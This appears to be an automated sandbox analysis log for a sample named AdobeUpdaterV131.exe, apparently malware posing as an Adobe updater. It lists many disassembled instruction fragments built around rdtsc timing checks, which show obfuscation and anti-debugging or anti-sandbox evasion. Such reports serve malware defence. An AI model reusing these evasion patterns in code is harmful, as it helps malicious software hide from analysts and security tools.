            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0C28 second address: 4ED0CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F09D0731CB4h 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F09D0731CB1h 0x00000015 or ax, 1896h 0x0000001a jmp 00007F09D0731CB1h 0x0000001f popfd 0x00000020 push eax 0x00000021 mov bx, DDD2h 0x00000025 pop edi 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 pushad 0x00000029 mov dx, si 0x0000002c mov esi, 3760B1F7h 0x00000031 popad 0x00000032 mov eax, dword ptr [76FB65FCh] 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F09D0731CB9h 0x0000003e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0CA1 second address: 4ED0CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F09D0D9C3DDh 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0CC7 second address: 4ED0D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0A42794930h 0x0000000f jmp 00007F09D0731CAEh 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 mov si, 356Dh 0x0000001b jmp 00007F09D0731CAAh 0x00000020 popad 0x00000021 xor eax, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F09D0731CB3h 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0D1C second address: 4ED0D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED0D39 second address: 4ED0D6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 7B18355Eh 0x00000014 call 00007F09D0731CAFh 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED019D second address: 4ED01A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED01A1 second address: 4ED01BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov dh, ECh 0x0000000b pushad 0x0000000c mov cx, 2E2Fh 0x00000010 mov ecx, 37D27E4Bh 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bh, ch 0x0000001d popad 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED01BF second address: 4ED01D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 mov ecx, 06CC50E9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4ED01D3 second address: 4ED01EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0731CB7h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E90056 second address: 4E900B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov di, 62FEh 0x00000011 pushfd 0x00000012 jmp 00007F09D0D9C3DFh 0x00000017 sub ch, FFFFFFAEh 0x0000001a jmp 00007F09D0D9C3E9h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 pushad 0x00000025 mov ax, AF09h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push esi 0x0000002d jmp 00007F09D0D9C3DBh 0x00000032 pop ecx 0x00000033 popad 0x00000034 and esp, FFFFFFF8h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E900B7 second address: 4E900BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E900BD second address: 4E9013E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F09D0D9C3E6h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F09D0D9C3E1h 0x00000017 and esi, 0E027956h 0x0000001d jmp 00007F09D0D9C3E1h 0x00000022 popfd 0x00000023 mov dx, ax 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 jmp 00007F09D0D9C3DAh 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F09D0D9C3E0h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E9013E second address: 4E90142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E90142 second address: 4E90148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E90148 second address: 4E901C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 call 00007F09D0731CB1h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F09D0731CB7h 0x00000015 mov ebx, dword ptr [ebp+10h] 0x00000018 pushad 0x00000019 pushad 0x0000001a movzx esi, bx 0x0000001d popad 0x0000001e mov ecx, ebx 0x00000020 popad 0x00000021 push esi 0x00000022 jmp 00007F09D0731CB2h 0x00000027 mov dword ptr [esp], esi 0x0000002a jmp 00007F09D0731CB0h 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F09D0731CB7h 0x00000039 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E901C9 second address: 4E901FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007F09D0D9C3E0h 0x0000000c or eax, 26D53E88h 0x00000012 jmp 00007F09D0D9C3DBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E901FC second address: 4E90200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E90200 second address: 4E90206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E90206 second address: 4E9026D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F09D0731CABh 0x0000000f xchg eax, edi 0x00000010 jmp 00007F09D0731CB6h 0x00000015 test esi, esi 0x00000017 jmp 00007F09D0731CB0h 0x0000001c je 00007F0A427D0072h 0x00000022 jmp 00007F09D0731CB0h 0x00000027 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002e pushad 0x0000002f movzx eax, di 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E9026D second address: 4E902DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 je 00007F0A42E3A78Eh 0x0000000c jmp 00007F09D0D9C3DBh 0x00000011 mov edx, dword ptr [esi+44h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F09D0D9C3E4h 0x0000001b add ecx, 57B06338h 0x00000021 jmp 00007F09D0D9C3DBh 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007F09D0D9C3E6h 0x0000002f jmp 00007F09D0D9C3E5h 0x00000034 popfd 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E902DE second address: 4E90311 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 pushfd 0x00000011 jmp 00007F09D0731CB0h 0x00000016 or cx, 5F28h 0x0000001b jmp 00007F09D0731CABh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E90311 second address: 4E90317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E90317 second address: 4E9031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E9031B second address: 4E90370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F09D0D9C3E4h 0x00000018 and ah, FFFFFFB8h 0x0000001b jmp 00007F09D0D9C3DBh 0x00000020 popfd 0x00000021 mov ch, DCh 0x00000023 popad 0x00000024 jne 00007F0A42E3A704h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F09D0D9C3DEh 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4E90370 second address: 4E90375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA001D second address: 4EA0023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0023 second address: 4EA0028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0028 second address: 4EA008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F09D0D9C3E4h 0x0000000f or ecx, 74C37A58h 0x00000015 jmp 00007F09D0D9C3DBh 0x0000001a popfd 0x0000001b mov cx, 230Fh 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F09D0D9C3E0h 0x00000028 jmp 00007F09D0D9C3E5h 0x0000002d popfd 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA008A second address: 4EA00C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007F09D0731CB6h 0x0000000e and esp, FFFFFFF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F09D0731CB7h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA00C5 second address: 4EA0102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F09D0D9C3DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F09D0D9C3DEh 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0102 second address: 4EA0114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CAEh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0114 second address: 4EA0149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F09D0D9C3E7h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F09D0D9C3E0h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0149 second address: 4EA014F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA014F second address: 4EA0160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3DDh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0160 second address: 4EA0183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F09D0731CB6h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0183 second address: 4EA0192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0192 second address: 4EA01F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e pushfd 0x0000000f jmp 00007F09D0731CB9h 0x00000014 adc ecx, 16E55D06h 0x0000001a jmp 00007F09D0731CB1h 0x0000001f popfd 0x00000020 popad 0x00000021 mov esi, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA01F0 second address: 4EA0203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0203 second address: 4EA0248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, FA31h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub ebx, ebx 0x0000000c pushad 0x0000000d jmp 00007F09D0731CB3h 0x00000012 mov ax, C47Fh 0x00000016 popad 0x00000017 test esi, esi 0x00000019 jmp 00007F09D0731CB2h 0x0000001e je 00007F0A427B7DF8h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0248 second address: 4EA024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA024C second address: 4EA0252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0252 second address: 4EA0258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0258 second address: 4EA025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA025C second address: 4EA0285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 call 00007F09D0D9C3E6h 0x00000017 pop eax 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0285 second address: 4EA02EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F09D0731CB1h 0x0000000c sub ax, 9BE6h 0x00000011 jmp 00007F09D0731CB1h 0x00000016 popfd 0x00000017 popad 0x00000018 mov ecx, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov si, bx 0x00000020 pushfd 0x00000021 jmp 00007F09D0731CAFh 0x00000026 sub ah, 0000001Eh 0x00000029 jmp 00007F09D0731CB9h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA02EB second address: 4EA0340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0A42E22479h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F09D0D9C3E3h 0x00000018 and al, FFFFFFDEh 0x0000001b jmp 00007F09D0D9C3E9h 0x00000020 popfd 0x00000021 mov esi, 6E44BCA7h 0x00000026 popad 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0340 second address: 4EA0374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FB6968h], 00000002h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F09D0731CB8h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0374 second address: 4EA0383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0383 second address: 4EA042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov dh, E4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F0A427B7CCEh 0x00000011 pushad 0x00000012 mov eax, 75B27D5Fh 0x00000017 mov edx, eax 0x00000019 popad 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007F09D0731CAEh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 mov edi, ecx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F09D0731CB8h 0x0000002d and al, 00000028h 0x00000030 jmp 00007F09D0731CABh 0x00000035 popfd 0x00000036 mov dh, ah 0x00000038 popad 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F09D0731CB0h 0x00000042 jmp 00007F09D0731CB5h 0x00000047 popfd 0x00000048 mov dx, ax 0x0000004b popad 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e mov edi, esi 0x00000050 jmp 00007F09D0731CB4h 0x00000055 popad 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA042C second address: 4EA0449 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA04BE second address: 4EA04D2 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 5C306ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop edi 0x00000010 movzx esi, di 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA04D2 second address: 4EA04D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA04D8 second address: 4EA04F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA04F0 second address: 4EA04F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA04F4 second address: 4EA0511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EA0511 second address: 4EA0536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3DDh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F01A23 second address: 4F01A67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dl, A3h 0x00000008 popad 0x00000009 push 00000001h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F09D0731CB9h 0x00000014 and si, EFC6h 0x00000019 jmp 00007F09D0731CB1h 0x0000001e popfd 0x0000001f mov cx, 7477h 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F01A67 second address: 4F01A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F01A80 second address: 4F01A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4F01AB2 second address: 4F01A23 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 193Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F09D0D9C3E5h 0x0000000e adc si, 3A96h 0x00000013 jmp 00007F09D0D9C3E1h 0x00000018 popfd 0x00000019 popad 0x0000001a retn 0004h 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call ebx 0x00000023 mov edi, edi 0x00000025 jmp 00007F09D0D9C3E0h 0x0000002a xchg eax, ebp 0x0000002b jmp 00007F09D0D9C3E0h 0x00000030 push eax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F09D0D9C3E1h 0x00000038 jmp 00007F09D0D9C3DBh 0x0000003d popfd 0x0000003e mov di, ax 0x00000041 popad 0x00000042 xchg eax, ebp 0x00000043 jmp 00007F09D0D9C3E2h 0x00000048 mov ebp, esp 0x0000004a jmp 00007F09D0D9C3E0h 0x0000004f push 0000007Fh 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 movzx eax, di 0x00000057 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9057DD second address: 9057E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9059F2 second address: 9059F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9059F6 second address: 905A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jl 00007F09D0731CA8h 0x0000000f pushad 0x00000010 jo 00007F09D0731CA6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 4EC0A3C second address: 4EC0A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
